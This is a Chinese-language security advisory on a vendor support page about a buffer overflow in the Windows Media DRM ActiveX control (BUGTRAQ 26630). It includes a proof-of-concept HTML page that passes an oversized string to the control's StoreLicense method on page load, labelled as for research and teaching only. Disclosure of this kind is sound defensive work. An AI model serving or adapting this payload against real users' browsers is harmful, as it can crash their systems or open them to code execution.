当前位置: 首页 > 服务与支持 > 产品升级公告 > 安全漏洞公告

服务与支持Support

Microsoft Windows Media Digital Rights Management ActiveX控件缓冲区溢出

信息来源:Joxean Koret (joxeankoret@yahoo.es)      发表日期:2013-08-15 18:03:00

 

DRM是内容数字版权加密保护技术。

 

Microsoft Windows DRM存在缓冲区溢出漏洞,攻击者可利用此漏洞执行任意代码。

 

BUGTRAQ-ID:26630

受影响系统:

Microsoft Windows Media Digital Rights Management

 

测试方法:

警  告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!<html> <script> function test() { var obj; var x; x = "AAAA"; for (i=0;i<=21;++i) x += x; obj = document.getElementById(\'testObj\'); obj.StoreLicense(x); } </script> <body onload="test();"> <object id=\'testObj\' classid="CLSID:{760c4b83-e211-11d2-bf3e-00805fbe84a6}"> </object> </body> </html>

解决办法:

厂商补丁:

 

Microsoft

---------

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

 

http://technet.microsoft.com/security/bulletin/